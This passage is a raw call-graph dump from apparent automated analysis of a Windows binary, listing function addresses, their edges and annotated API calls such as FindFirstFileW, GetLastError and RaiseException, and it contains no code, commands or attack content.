51775->51783 51807 407cd5 33 API calls 51775->51807 51839 407a18 ctype 17 API calls 51775->51839 52162 404b09 23 API calls 2 library calls 51775->52162 51776->51769 51785 40495f 51779->51785 52168 4035f2 18 API calls 51780->52168 51788 4044a3 51782->51788 51793 407cd5 33 API calls 51783->51793 51802 404422 51784->51802 51817 407cd5 33 API calls 51784->51817 51844 407a18 ctype 17 API calls 51784->51844 52172 404b09 23 API calls 2 library calls 51784->52172 52184 405489 17 API calls 2 library calls 51785->52184 51787 404313 51795 405529 18 API calls 51787->51795 51796 408604 ctype 17 API calls 51788->51796 51789->51797 51790->51799 51792 407cd5 33 API calls 51792->51800 51801 40422e 51793->51801 51804 404320 51795->51804 51805 4044b0 51796->51805 51806 407cd5 33 API calls 51797->51806 52171 46b8f4 RaiseException 51798->52171 51799->51792 51799->51800 51800->51771 52183 46b8f4 RaiseException 51800->52183 51816 407cd5 33 API calls 51801->51816 51810 407cd5 33 API calls 51802->51810 51803 40496f 51808 407a18 ctype 17 API calls 51803->51808 51809 407a18 ctype 17 API calls 51804->51809 52175 406e46 17 API calls 2 library calls 51805->52175 51827 40483d 51806->51827 51807->51775 51811 40497a 51808->51811 51812 40432c 51809->51812 51814 40442f 51810->51814 51821 408604 ctype 17 API calls 51811->51821 52170 4035f2 18 API calls 51812->52170 51823 407cd5 33 API calls 51814->51823 51820 404249 51816->51820 51817->51784 51819 4044ca 52176 405233 17 API calls 2 library calls 51819->52176 51831 407cd5 33 API calls 51820->51831 51825 404995 51821->51825 51829 40444a 51823->51829 52185 406e46 17 API calls 2 library calls 51825->52185 51826 4044d9 51830 40862d ctype 17 API calls 51826->51830 51828 407cd5 33 API calls 51827->51828 51847 404852 51828->51847 51838 407cd5 33 API calls 51829->51838 51833 4044ef 51830->51833 51834 404257 51831->51834 51836 408604 ctype 17 API calls 51833->51836 51834->51736 51842 407cd5 33 API calls 51834->51842 51835 4049b2 52186 405233 17 API calls 2 library calls 51835->52186 51837 4044fb 51836->51837 51837->51595 51841 404458 51838->51841 51839->51775 51841->51757 51846 407cd5 33 API calls 51841->51846 51842->51736 51843 403fe9 51843->51714 51844->51784 51845 404895 51848 407a18 ctype 17 API calls 51845->51848 51846->51757 51847->51845 51850 407cd5 33 API calls 51847->51850 51849 4048a4 51848->51849 52182 405489 17 API calls 2 library calls 51849->52182 51852 40488e 51850->51852 51854 407cd5 33 API calls 51852->51854 51853 4048b4 51855 407a18 ctype 17 API calls 51853->51855 51854->51845 51855->51856 51856->51647 51858 401932 51857->51858 51859 401947 51857->51859 54407 46b8f4 RaiseException 51858->54407 51859->51553 51861->51569 51862->51573 51863->51575 51865 403550 51864->51865 51866 401e9a 18 API calls 51865->51866 51867 403566 51866->51867 51868 406c53 51867->51868 51869 406c5d __EH_prolog 51868->51869 52191 4039c0 51869->52191 51871 406c6d 52194 407456 51871->52194 51876 40862d ctype 17 API calls 51883 406c89 51876->51883 51877 401e9a 18 API calls 51877->51883 51879 406cfd 51882 407a18 ctype 17 API calls 51879->51882 51881 401e26 18 API calls 51881->51883 51884 406d05 51882->51884 51883->51877 51883->51879 51883->51881 51887 407a18 17 API calls ctype 51883->51887 52206 406ba9 51883->52206 52216 406796 18 API calls __EH_prolog 51883->52216 51885 407a18 ctype 17 API calls 51884->51885 51886 406d0d 51885->51886 51888 407a18 ctype 17 API calls 51886->51888 51887->51883 51889 403abc 51888->51889 51889->51580 51891 4036f0 51890->51891 51892 40372a 51891->51892 51893 407a18 17 API calls ctype 51891->51893 51892->51587 51893->51891 51895 404c1c __EH_prolog 51894->51895 51896 401e9a 18 API calls 51895->51896 51897 404c54 51896->51897 51898 401e9a 18 API calls 51897->51898 51899 404c69 51898->51899 51900 401e9a 18 API calls 51899->51900 51901 404c7e 51900->51901 52254 404d09 51901->52254 51904 401e9a 18 API calls 51905 404ce0 51904->51905 51906 401e9a 18 API calls 51905->51906 51907 403b00 51906->51907 51908 40fec3 51907->51908 52282 406d26 51908->52282 51910 40fecd 51910->51593 51912 410367 __EH_prolog 51911->51912 52286 410a4c 51912->52286 51915 41038f 52298 41191e 51915->52298 51917 41191e 18 API calls 51918 410422 51917->51918 51920 410459 51918->51920 52372 410ca4 41 API calls 2 library calls 51918->52372 51923 410485 51920->51923 52373 410ca4 41 API calls 2 library calls 51920->52373 51922 4104f7 52304 410b06 51922->52304 51923->51922 51925 401e26 18 API calls 51923->51925 51925->51922 51926 41051c 51927 401e26 18 API calls 51926->51927 51929 410552 51926->51929 51927->51929 51928 410587 51930 41075b 51928->51930 51937 410591 51928->51937 51929->51928 51931 401e26 18 API calls 51929->51931 51932 41076b 51930->51932 51975 4108ae 51930->51975 51931->51928 52381 41124b 22 API calls 2 library calls 51932->52381 51934 41077c 52382 4117bd 18 API calls 2 library calls 51934->52382 51935 410756 51936 40925b 18 API calls 51935->51936 51939 403bb1 51936->51939 51946 4105ed 51937->51946 52374 410ca4 41 API calls 2 library calls 51937->52374 51985 4079f2 51939->51985 51941 410618 51942 41062d 51941->51942 52376 410ac9 18 API calls 51941->52376 52319 411046 51942->52319 51943 4039c0 18 API calls 51943->51975 51946->51941 52375 410ca4 41 API calls 2 library calls 51946->52375 51951 410643 51961 4039c0 18 API calls 51951->51961 51952 410684 52327 41003e 51952->52327 51953 410801 51955 410864 51953->51955 51965 410884 51953->51965 52383 46b8f4 RaiseException 51953->52383 51955->51965 52384 46b8f4 RaiseException 51955->52384 51956 410681 51984 4106f6 51956->51984 52379 4117bd 18 API calls 2 library calls 51956->52379 51957 4108a1 51959 411046 27 API calls 51957->51959 51958 410786 51958->51953 51962 401e26 18 API calls 51958->51962 51959->51935 51966 410659 51961->51966 51962->51953 51963 40862d ctype 17 API calls 51967 41074a 51963->51967 51965->51957 51969 401e26 18 API calls 51965->51969 52377 406796 18 API calls __EH_prolog 51966->52377 51971 408604 ctype 17 API calls 51967->51971 51969->51957 51971->51935 51972 4072c9 18 API calls 51972->51975 51973 410669 52378 406796 18 API calls __EH_prolog 51973->52378 51975->51935 51975->51943 51975->51972 51977 401e26 18 API calls 51975->51977 51982 407a18 17 API calls ctype 51975->51982 51976 410675 51980 407a18 ctype 17 API calls 51976->51980 51977->51975 51978 4106a7 51979 4106cf 51978->51979 52380 46b8f4 RaiseException 51978->52380 51983 401e26 18 API calls 51979->51983 51979->51984 51980->51956 51982->51975 51983->51984 51984->51963 51986 4079fd 51985->51986 51987 407a16 51986->51987 52644 46b8f4 RaiseException 51986->52644 51987->51612 51990 417426 __EH_prolog 51989->51990 51991 40862d ctype 17 API calls 51990->51991 51998 417435 ctype 51991->51998 51992 403bf3 51992->51619 52138 46b8f4 RaiseException 51992->52138 51994 403593 18 API calls 51994->51998 51998->51992 51998->51994 52645 4174e7 51998->52645 52648 41721b 51998->52648 52675 40fa26 51998->52675 52681 4177f2 18 API calls __EH_prolog 51998->52681 52682 405aaf 17 API calls 2 library calls 51998->52682 52001 4176c8 __EH_prolog 52000->52001 52002 40862d ctype 17 API calls 52001->52002 52005 4176d9 52002->52005 52003 403c74 52003->51621 52140 46b8f4 RaiseException 52003->52140 52004 4072ea 18 API calls 52004->52005 52005->52003 52005->52004 52006 415c6d 18 API calls 52005->52006 52007 41777c 52005->52007 52008 407a18 ctype 17 API calls 52005->52008 52006->52005 52009 40862d ctype 17 API calls 52007->52009 52008->52005 52010 417784 52009->52010 52011 407a18 ctype 17 API calls 52010->52011 52011->52003 52013 401e32 52012->52013 52015 401e44 52012->52015 52014 401e9a 18 API calls 52013->52014 52014->52015 52016 40347f 52015->52016 52017 401e9a 18 API calls 52016->52017 52018 4034a2 52017->52018 52018->51678 52020 401e9a 18 API calls 52019->52020 52021 404b93 52020->52021 52021->51694 52023 40867e 18 API calls 52022->52023 52026 405bd2 52023->52026 52024 4046a4 52027 401e9a 52024->52027 52026->52024 52686 405bf3 18 API calls __EH_prolog 52026->52686 52028 401eaa 52027->52028 52031 401eda 52027->52031 52029 4079f2 RaiseException 52028->52029 52030 401eb4 52029->52030 52030->52031 52032 407a18 ctype 17 API calls 52030->52032 52033 415d31 52031->52033 52032->52031 52041 415d3b __EH_prolog 52033->52041 52034 415e28 52036 4079f2 RaiseException 52034->52036 52035 40351a 18 API calls 52035->52041 52037 415e32 52036->52037 52044 415e45 52037->52044 52823 41669f 18 API calls __EH_prolog 52037->52823 52038 40b431 27 API calls 52038->52041 52041->52034 52041->52035 52041->52038 52042 415e49 52041->52042 52043 407a18 ctype 17 API calls 52041->52043 52047 415e5e 52041->52047 52822 42389f 18 API calls 52041->52822 52824 46b8f4 RaiseException 52042->52824 52043->52041 52051 415eec 52044->52051 52130 415f10 ctype 52044->52130 52046 4163df 52050 408604 ctype 17 API calls 52046->52050 52825 46b8f4 RaiseException 52047->52825 52049 40351a 18 API calls 52049->52130 52052 415f08 52050->52052 52053 408604 ctype 17 API calls 52051->52053 52052->51737 52053->52052 52054 40b431 27 API calls 52054->52130 52055 41668a 52838 46b8f4 RaiseException 52055->52838 52057 41646b 52058 407a18 ctype 17 API calls 52057->52058 52129 416473 52058->52129 52059 408604 ctype 17 API calls 52059->52052 52060 40862d ctype 17 API calls 52060->52130 52062 416489 52063 408604 ctype 17 API calls 52062->52063 52064 416495 52063->52064 52830 403411 17 API calls 2 library calls 52064->52830 52065 4072c9 18 API calls 52065->52130 52067 4164a4 52069 407a18 ctype 17 API calls 52067->52069 52068 4164c4 52070 408604 ctype 17 API calls 52068->52070 52069->52129 52071 4164d0 52070->52071 52831 403411 17 API calls 2 library calls 52071->52831 52072 408604 ctype 17 API calls 52072->52130 52074 4164df 52076 407a18 ctype 17 API calls 52074->52076 52076->52129 52077 401e9a 18 API calls 52077->52130 52079 4164fd 52080 408604 ctype 17 API calls 52079->52080 52083 416509 52080->52083 52081 401e26 18 API calls 52081->52130 52082 416536 52084 407a18 ctype 17 API calls 52082->52084 52832 403411 17 API calls 2 library calls 52083->52832 52087 41653e 52084->52087 52086 407a18 17 API calls ctype 52086->52130 52089 408604 ctype 17 API calls 52087->52089 52088 416518 52090 407a18 ctype 17 API calls 52088->52090 52091 41654b 52089->52091 52090->52129 52833 403411 17 API calls 2 library calls 52091->52833 52092 416578 52093 407a18 ctype 17 API calls 52092->52093 52096 416580 52093->52096 52099 408604 ctype 17 API calls 52096->52099 52097 4165ba 52102 407a18 ctype 17 API calls 52097->52102 52098 41655a 52101 407a18 ctype 17 API calls 52098->52101 52103 41658d 52099->52103 52100 4165f9 52104 407a18 ctype 17 API calls 52100->52104 52101->52129 52105 4165c2 52102->52105 52834 403411 17 API calls 2 library calls 52103->52834 52107 416601 52104->52107 52108 408604 ctype 17 API calls 52105->52108 52111 408604 ctype 17 API calls 52107->52111 52109 4165cf 52108->52109 52835 403411 17 API calls 2 library calls 52109->52835 52110 41659c 52115 407a18 ctype 17 API calls 52110->52115 52116 41660e 52111->52116 52112 416638 52114 407a18 ctype 17 API calls 52112->52114 52118 41663d 52114->52118 52115->52129 52836 403411 17 API calls 2 library calls 52116->52836 52117 4165de 52120 407a18 ctype 17 API calls 52117->52120 52121 408604 ctype 17 API calls 52118->52121 52120->52129 52123 41664a 52121->52123 52122 41661d 52124 407a18 ctype 17 API calls 52122->52124 52837 403411 17 API calls 2 library calls 52123->52837 52124->52129 52126 416659 52127 407a18 ctype 17 API calls 52126->52127 52127->52129 52128 415c6d 18 API calls 52128->52130 52129->52059 52130->52046 52130->52049 52130->52054 52130->52055 52130->52057 52130->52060 52130->52062 52130->52065 52130->52068 52130->52072 52130->52077 52130->52079 52130->52081 52130->52082 52130->52086 52130->52092 52130->52097 52130->52100 52130->52112 52130->52128 52687 418a23 52130->52687 52747 46c55c 52130->52747 52754 416922 52130->52754 52826 407399 52130->52826 52829 403411 17 API calls 2 library calls 52130->52829 52132->51586 52133->51601 52134->51608 52135->51586 52136->51605 52137->51603 52138->51619 52139->51616 52140->51621 52141->51747 52142->51707 52143->51586 52144->51642 52145->51698 52146->51586 52147->51634 52148->51638 52149->51697 52150->51843 52151->51624 52153 4035b0 52152->52153 52154 401e9a 18 API calls 52153->52154 52155 4035c6 52154->52155 52155->51645 52156->51695 52157->51719 52158->51725 52159->51729 52160->51731 52161->51744 52162->51775 52164 403a26 18 API calls 52163->52164 52165 405539 52164->52165 52165->51762 52165->52165 52166->51752 52167->51759 52168->51765 52169->51787 52170->51798 52171->51739 52172->51784 52173->51761 52174->51773 52175->51819 52176->51826 52177->51856 52178->51681 52179->51689 52180->51636 52181->51763 52182->51853 52183->51771 52184->51803 52185->51835 52186->51843 52187->51650 52188->51706 52189->51843 52190->51664 52192 401e9a 18 API calls 52191->52192 52193 4039da 52192->52193 52193->51871 52193->52193 52195 407460 __EH_prolog 52194->52195 52217 407537 52195->52217 52197 40746f 52198 407a18 ctype 17 API calls 52197->52198 52199 406c7a 52198->52199 52200 40741b 52199->52200 52201 407425 __EH_prolog 52200->52201 52202 407537 18 API calls 52201->52202 52203 407434 52202->52203 52204 407a18 ctype 17 API calls 52203->52204 52205 406c82 52204->52205 52205->51876 52211 406bb3 __EH_prolog 52206->52211 52207 406c10 52207->51883 52208 406c28 52238 4072c9 52208->52238 52209 4054fe 18 API calls 52209->52211 52211->52207 52211->52208 52211->52209 52213 401e26 18 API calls 52214 406c44 52213->52214 52215 407a18 ctype 17 API calls 52214->52215 52215->52207 52216->51883 52218 407541 __EH_prolog 52217->52218 52219 401e9a 18 API calls 52218->52219 52220 40755d 52219->52220 52231 4054fe 52220->52231 52223 4054fe 18 API calls 52224 407574 52223->52224 52225 4054fe 18 API calls 52224->52225 52226 40757e 52225->52226 52227 4039c0 18 API calls 52226->52227 52228 40758a 52227->52228 52229 407a18 ctype 17 API calls 52228->52229 52230 407592 52229->52230 52230->52197 52234 403a26 52231->52234 52235 403a6a 52234->52235 52236 403a3a 52234->52236 52235->52223 52237 401e9a 18 API calls 52236->52237 52237->52235 52241 4072ea 52238->52241 52243 4072f4 __EH_prolog 52241->52243 52242 407328 52245 401e9a 18 API calls 52242->52245 52243->52242 52244 40731d 52243->52244 52246 4039c0 18 API calls 52244->52246 52247 40733b 52245->52247 52248 406c37 52246->52248 52249 401e9a 18 API calls 52247->52249 52248->52213 52250 407348 52249->52250 52251 4039c0 18 API calls 52250->52251 52252 40737c 52251->52252 52253 407a18 ctype 17 API calls 52252->52253 52253->52248 52255 404d13 __EH_prolog 52254->52255 52266 404e10 52255->52266 52258 401e9a 18 API calls 52259 404d7b 52258->52259 52260 401e9a 18 API calls 52259->52260 52261 404da0 52260->52261 52262 401e9a 18 API calls 52261->52262 52263 404dcb 52262->52263 52264 401e9a 18 API calls 52263->52264 52265 404cc8 52264->52265 52265->51904 52267 404e1a __EH_prolog 52266->52267 52268 401e9a 18 API calls 52267->52268 52269 404e36 52268->52269 52270 401e9a 18 API calls 52269->52270 52271 404e4a 52270->52271 52272 401e9a 18 API calls 52271->52272 52273 404e5f 52272->52273 52274 401e9a 18 API calls 52273->52274 52275 404e74 52274->52275 52276 401e9a 18 API calls 52275->52276 52277 404e89 52276->52277 52278 401e9a 18 API calls 52277->52278 52279 404ea1 52278->52279 52280 401e9a 18 API calls 52279->52280 52281 404d5c 52280->52281 52281->52258 52283 406d30 __EH_prolog 52282->52283 52284 4079f2 RaiseException 52283->52284 52285 406d68 52284->52285 52285->51910 52287 410a56 __EH_prolog 52286->52287 52288 4039c0 18 API calls 52287->52288 52289 410a66 52288->52289 52290 401e9a 18 API calls 52289->52290 52291 410a86 52290->52291 52385 407204 52291->52385 52294 407a18 ctype 17 API calls 52295 410aaf 52294->52295 52296 407a18 ctype 17 API calls 52295->52296 52297 410ab7 52296->52297 52297->51915 52300 411928 __EH_prolog 52298->52300 52299 41040e 52299->51917 52300->52299 52301 4039c0 18 API calls 52300->52301 52303 41195e 52301->52303 52302 407a18 ctype 17 API calls 52302->52299 52303->52302 52305 410b10 __EH_prolog 52304->52305 52307 403532 18 API calls 52305->52307 52309 410b5b 52305->52309 52306 410bcb 52306->51926 52310 410b3c 52307->52310 52308 410bb5 52403 46b8f4 RaiseException 52308->52403 52309->52306 52309->52308 52312 4072c9 18 API calls 52309->52312 52318 407a18 ctype 17 API calls 52309->52318 52401 410bdc 30 API calls 2 library calls 52309->52401 52402 410ac9 18 API calls 52309->52402 52400 410ac9 18 API calls 52310->52400 52312->52309 52315 410b4f 52317 407a18 ctype 17 API calls 52315->52317 52317->52309 52318->52309 52320 411051 52319->52320 52321 410635 52319->52321 52320->52321 52404 411068 52320->52404 52323 40925b 52321->52323 52324 40926b 52323->52324 52325 4092a4 52324->52325 52496 408ec6 18 API calls __EH_prolog 52324->52496 52325->51951 52325->51952 52328 410048 __EH_prolog 52327->52328 52497 415349 52328->52497 52331 410278 52525 46b8f4 RaiseException 52331->52525 52333 4100c5 52335 408604 ctype 17 API calls 52333->52335 52334 41028d 52334->51956 52336 4100d1 52335->52336 52337 40862d ctype 17 API calls 52336->52337 52338 4100e0 52337->52338 52339 408604 ctype 17 API calls 52338->52339 52349 4100ec 52339->52349 52340 410133 52508 4102df 17 API calls 2 library calls 52340->52508 52343 410142 52353 41015c 52343->52353 52509 46b8f4 RaiseException 52343->52509 52346 4101ba 52512 4195a6 18 API calls ctype 52346->52512 52347 407a18 ctype 17 API calls 52347->52349 52348 401e9a 18 API calls 52348->52353 52349->52340 52349->52347 52506 41528b 18 API calls 52349->52506 52507 406796 18 API calls __EH_prolog 52349->52507 52352 4101da 52513 40867e 52352->52513 52353->52346 52353->52348 52358 407a18 ctype 17 API calls 52353->52358 52510 40a5af 26 API calls 52353->52510 52511 406796 18 API calls __EH_prolog 52353->52511 52357 40867e 18 API calls 52362 4101f0 52357->52362 52358->52353 52359 410222 52361 408604 ctype 17 API calls 52359->52361 52360 406796 18 API calls 52360->52362 52363 41022e 52361->52363 52362->52359 52362->52360 52364 40862d ctype 17 API calls 52363->52364 52365 41023d 52364->52365 52366 408604 ctype 17 API calls 52365->52366 52367 410249 52366->52367 52368 40862d ctype 17 API calls 52367->52368 52369 41025b 52368->52369 52370 408604 ctype 17 API calls 52369->52370 52371 410267 52370->52371 52371->51956 52372->51920 52373->51923 52374->51946 52375->51941 52376->51942 52377->51973 52378->51976 52379->51978 52380->51979 52381->51934 52382->51958 52383->51955 52384->51965 52388 40720e __EH_prolog 52385->52388 52386 40726d 52386->52294 52387 403532 18 API calls 52387->52388 52388->52386 52388->52387 52389 4072af 52388->52389 52390 407281 52388->52390 52392 407a18 ctype 17 API calls 52388->52392 52391 407a18 ctype 17 API calls 52389->52391 52393 4072c9 18 API calls 52390->52393 52391->52386 52392->52388 52394 40728f 52393->52394 52395 401e26 18 API calls 52394->52395 52396 40729c 52395->52396 52397 407a18 ctype 17 API calls 52396->52397 52398 4072a4 52397->52398 52399 407a18 ctype 17 API calls 52398->52399 52399->52386 52400->52315 52401->52309 52402->52309 52403->52306 52405 411072 __EH_prolog 52404->52405 52419 411215 52405->52419 52408 411215 27 API calls 52409 411091 52408->52409 52414 4110ae ctype 52409->52414 52423 411194 52409->52423 52411 411185 52411->52320 52416 409391 18 API calls 52414->52416 52417 411130 52414->52417 52415 411068 27 API calls 52415->52417 52416->52414 52417->52411 52417->52415 52418 407a18 17 API calls ctype 52417->52418 52437 40b0a0 52417->52437 52447 411bd0 18 API calls 2 library calls 52417->52447 52418->52417 52420 411223 52419->52420 52421 411087 52419->52421 52420->52421 52422 411194 27 API calls 52420->52422 52421->52408 52422->52420 52424 41119e __EH_prolog 52423->52424 52436 411206 52424->52436 52448 40b521 52424->52448 52427 40b0a0 18 API calls 52428 4111cf 52427->52428 52451 40b431 52428->52451 52430 4111dd 52431 407a18 ctype 17 API calls 52430->52431 52432 4111ec 52431->52432 52433 4111fe 52432->52433 52434 401e26 18 API calls 52432->52434 52435 407a18 ctype 17 API calls 52433->52435 52434->52433 52435->52436 52436->52409 52438 40b0aa __EH_prolog 52437->52438 52439 4039c0 18 API calls 52438->52439 52440 40b0bd 52439->52440 52441 405529 18 API calls 52440->52441 52442 40b0cc 52441->52442 52443 4039c0 18 API calls 52442->52443 52444 40b0d7 52443->52444 52445 407a18 ctype 17 API calls 52444->52445 52446 40b0df 52445->52446 52446->52417 52447->52417 52449 401e9a 18 API calls 52448->52449 52450 40b538 52449->52450 52450->52427 52452 40b43b __EH_prolog 52451->52452 52453 40b49e 52452->52453 52456 40b451 52452->52456 52460 40b174 52453->52460 52458 40b47e ctype 52456->52458 52459 403593 18 API calls 52456->52459 52458->52430 52459->52458 52461 40b17e __EH_prolog 52460->52461 52462 40b154 FindClose 52461->52462 52463 40b18c 52462->52463 52464 40b20d 52463->52464 52465 40b20f 52463->52465 52466 40b19f FindFirstFileW 52463->52466 52486 40b154 52464->52486 52467 403532 18 API calls 52465->52467 52468 40b1b9 52466->52468 52484 40b1f8 52466->52484 52469 40b21a AreFileApisANSI 52467->52469 52470 401e9a 18 API calls 52468->52470 52493 40822f 19 API calls 52469->52493 52473 40b1cc 52470->52473 52489 40b863 52473->52489 52474 40b238 FindFirstFileA 52477 407a18 ctype 17 API calls 52474->52477 52480 40b252 52477->52480 52478 40b1ec 52482 407a18 ctype 17 API calls 52478->52482 52479 40b1de FindFirstFileW 52479->52478 52481 407a18 ctype 17 API calls 52480->52481 52483 40b25e 52481->52483 52482->52484 52483->52464 52494 40b2ea 20 API calls 2 library calls 52483->52494 52484->52464 52492 40b28b 18 API calls 52484->52492 52487 40b15e FindClose 52486->52487 52488 40b169 52486->52488 52487->52488 52488->52458 52495 40b6e9 19 API calls 2 library calls 52489->52495 52491 40b1da 52491->52478 52491->52479 52492->52464 52493->52474 52494->52464 52495->52491 52496->52324 52505 415353 __EH_prolog 52497->52505 52498 415401 52612 4152e1 18 API calls 52498->52612 52500 4100b4 52500->52331 52500->52333 52503 40862d ctype 17 API calls 52503->52505 52504 408604 ctype 17 API calls 52504->52505 52505->52498 52505->52500 52505->52503 52505->52504 52526 415420 52505->52526 52611 415303 18 API calls 52505->52611 52506->52349 52507->52349 52508->52343 52509->52353 52510->52353 52511->52353 52512->52352 52514 408692 52513->52514 52515 408722 52513->52515 52516 4086af 52514->52516 52641 46b8f4 RaiseException 52514->52641 52515->52357 52518 4086d6 52516->52518 52642 46b8f4 RaiseException 52516->52642 52520 4079f2 RaiseException 52518->52520 52523 4086fe 52518->52523 52522 4086e2 52520->52522 52521 407a18 ctype 17 API calls 52521->52515 52522->52523 52643 46b8f4 RaiseException 52522->52643 52523->52521 52525->52334 52533 41542a __EH_prolog 52526->52533 52527 4158a9 52625 411bd0 18 API calls 2 library calls 52527->52625 52529 4158b6 52530 4039c0 18 API calls 52529->52530 52531 4158ce 52530->52531 52532 407a18 ctype 17 API calls 52531->52532 52534 4158da 52532->52534 52533->52527 52543 41547d 52533->52543 52598 4154d7 52533->52598 52537 40351a 18 API calls 52534->52537 52535 415870 52538 408604 ctype 17 API calls 52535->52538 52536 40b0a0 18 API calls 52536->52598 52539 4158ea 52537->52539 52538->52543 52626 40b5c9 30 API calls 52539->52626 52542 40b0a0 18 API calls 52568 415723 52542->52568 52543->52505 52544 40b431 27 API calls 52544->52598 52545 415b38 GetLastError 52547 415c6d 18 API calls 52545->52547 52546 40351a 18 API calls 52546->52568 52550 415b47 52547->52550 52548 415542 GetLastError 52616 415c6d 52548->52616 52549 415b52 52554 407a18 ctype 17 API calls 52549->52554 52635 406796 18 API calls __EH_prolog 52550->52635 52551 40b431 27 API calls 52551->52568 52555 415b5d 52554->52555 52557 407a18 ctype 17 API calls 52555->52557 52556 4092a8 18 API calls 52594 415901 52556->52594 52559 415b6a 52557->52559 52558 415c6d 18 API calls 52558->52598 52563 40b154 FindClose 52559->52563 52560 406796 18 API calls 52560->52594 52561 415b77 52570 407a18 ctype 17 API calls 52561->52570 52562 415c6d 18 API calls 52562->52568 52563->52543 52564 406796 18 API calls 52564->52598 52565 41578c GetLastError 52565->52568 52567 407a18 17 API calls ctype 52567->52568 52568->52535 52568->52542 52568->52546 52568->52551 52568->52562 52568->52565 52568->52567 52573 40862d ctype 17 API calls 52568->52573 52576 408604 ctype 17 API calls 52568->52576 52581 415881 52568->52581 52623 406796 18 API calls __EH_prolog 52568->52623 52624 415bca 33 API calls 2 library calls 52568->52624 52574 415ba1 52570->52574 52571 407a18 17 API calls ctype 52571->52598 52573->52568 52575 407a18 ctype 17 API calls 52574->52575 52577 415bad 52575->52577 52576->52568 52579 40b154 FindClose 52577->52579 52578 40862d 17 API calls ctype 52578->52594 52579->52543 52580 408604 17 API calls ctype 52580->52598 52582 407a18 ctype 17 API calls 52581->52582 52583 4157be 52582->52583 52586 407a18 ctype 17 API calls 52583->52586 52585 408e8a 18 API calls 52585->52594 52587 415894 52586->52587 52589 408604 ctype 17 API calls 52587->52589 52589->52543 52590 408604 17 API calls ctype 52590->52594 52591 407a18 ctype 17 API calls 52591->52594 52592 40351a 18 API calls 52592->52594 52594->52545 52594->52549 52594->52556 52594->52560 52594->52561 52594->52578 52594->52585 52594->52590 52594->52591 52594->52592 52604 415b7b 52594->52604 52627 4150e0 18 API calls 2 library calls 52594->52627 52628 409500 52594->52628 52633 415bca 33 API calls 2 library calls 52594->52633 52634 40b5c9 30 API calls 52594->52634 52598->52536 52598->52544 52598->52548 52598->52558 52598->52564 52598->52568 52598->52571 52598->52580 52600 415795 52598->52600 52602 40862d 17 API calls ctype 52598->52602 52613 40351a 52598->52613 52619 408e8a 18 API calls 52598->52619 52620 4150e0 18 API calls 2 library calls 52598->52620 52621 43ac2f 18 API calls 52598->52621 52622 415bca 33 API calls 2 library calls 52598->52622 52601 40862d ctype 17 API calls 52600->52601 52603 4157a4 52601->52603 52602->52598 52606 408604 ctype 17 API calls 52603->52606 52605 40862d ctype 17 API calls 52604->52605 52607 415b87 52605->52607 52608 4157b3 52606->52608 52609 408604 ctype 17 API calls 52607->52609 52610 407a18 ctype 17 API calls 52608->52610 52609->52561 52610->52583 52611->52505 52612->52500 52614 401e9a 18 API calls 52613->52614 52615 40352e 52614->52615 52615->52598 52636 408656 52616->52636 52619->52598 52620->52598 52621->52598 52622->52598 52623->52568 52624->52568 52625->52529 52626->52594 52627->52594 52629 40867e 18 API calls 52628->52629 52630 409518 52629->52630 52631 409530 52630->52631 52640 406796 18 API calls __EH_prolog 52630->52640 52631->52594 52633->52594 52634->52594 52635->52549 52637 40867d 52636->52637 52638 40865e 52636->52638 52637->52598 52639 40867e 18 API calls 52638->52639 52639->52637 52640->52630 52641->52516 52642->52518 52643->52523 52644->51987 52646 401e9a 18 API calls 52645->52646 52647 417507 52646->52647 52647->51998 52649 417225 __EH_prolog 52648->52649 52650 403532 18 API calls 52649->52650 52666 41727c 52649->52666 52653 417261 52650->52653 52651 403532 18 API calls 52654 41728d 52651->52654 52652 41732d 52656 40862d ctype 17 API calls 52652->52656 52683 417377 18 API calls 2 library calls 52653->52683 52684 417377 18 API calls 2 library calls 52654->52684 52660 41733c 52656->52660 52658 40351a 18 API calls 52674 4172a8 52658->52674 52659 417270 52663 407a18 ctype 17 API calls 52659->52663 52661 408604 ctype 17 API calls 52660->52661 52664 417348 52661->52664 52662 41729c 52665 407a18 ctype 17 API calls 52662->52665 52663->52666 52667 40862d ctype 17 API calls 52664->52667 52665->52674 52666->52651 52666->52674 52668 41735a 52667->52668 52669 408604 ctype 17 API calls 52668->52669 52670 417366 52669->52670 52670->51998 52671 401e26 18 API calls 52671->52674 52673 407a18 17 API calls ctype 52673->52674 52674->52652 52674->52658 52674->52671 52674->52673 52685 417791 18 API calls __EH_prolog 52674->52685 52676 40fa33 52675->52676 52679 40fa67 52675->52679 52677 4079f2 RaiseException 52676->52677 52680 40fa3e ctype 52676->52680 52677->52680 52678 407a18 ctype 17 API calls 52678->52679 52679->51998 52680->52678 52681->51998 52682->51998 52683->52659 52684->52662 52685->52674 52686->52026 52688 418a2d __EH_prolog 52687->52688 52689 4079f2 RaiseException 52688->52689 52690 418a4a 52689->52690 52691 418a5c 52690->52691 52925 418c9d 18 API calls __EH_prolog 52690->52925 52693 401e9a 18 API calls 52691->52693 52694 418a93 52693->52694 52695 401e9a 18 API calls 52694->52695 52696 418aaa 52695->52696 52697 401e9a 18 API calls 52696->52697 52698 418ac1 52697->52698 52745 418b88 52698->52745 52839 40a28c 52698->52839 52703 418b27 52705 407399 18 API calls 52703->52705 52704 418aec GetLastError 52708 407a18 ctype 17 API calls 52704->52708 52710 418b36 52705->52710 52706 418bba 52711 407a18 ctype 17 API calls 52706->52711 52707 418bee 52709 40b0a0 18 API calls 52707->52709 52712 418afc 52708->52712 52713 418bfd 52709->52713 52714 401e26 18 API calls 52710->52714 52715 418bc2 52711->52715 52716 407a18 ctype 17 API calls 52712->52716 52926 406796 18 API calls __EH_prolog 52713->52926 52718 418b43 52714->52718 52719 407a18 ctype 17 API calls 52715->52719 52720 418b04 52716->52720 52722 407a18 ctype 17 API calls 52718->52722 52723 418bca 52719->52723 52724 407a18 ctype 17 API calls 52720->52724 52721 418c0c 52725 407a18 ctype 17 API calls 52721->52725 52726 418b4f 52722->52726 52727 407a18 ctype 17 API calls 52723->52727 52746 418b0c 52724->52746 52735 418c18 52725->52735 52728 4072c9 18 API calls 52726->52728 52727->52746 52730 418b5f 52728->52730 52729 418c4e 52731 407a18 ctype 17 API calls 52729->52731 52733 401e26 18 API calls 52730->52733 52734 418c6b 52731->52734 52732 40b0a0 18 API calls 52732->52735 52736 418b6c 52733->52736 52737 407a18 ctype 17 API calls 52734->52737 52735->52729 52735->52732 52744 407a18 ctype 17 API calls 52735->52744 52927 406796 18 API calls __EH_prolog 52735->52927 52739 407a18 ctype 17 API calls 52736->52739 52741 418c73 52737->52741 52740 418b78 52739->52740 52885 418e2d 52740->52885 52743 407a18 ctype 17 API calls 52741->52743 52743->52746 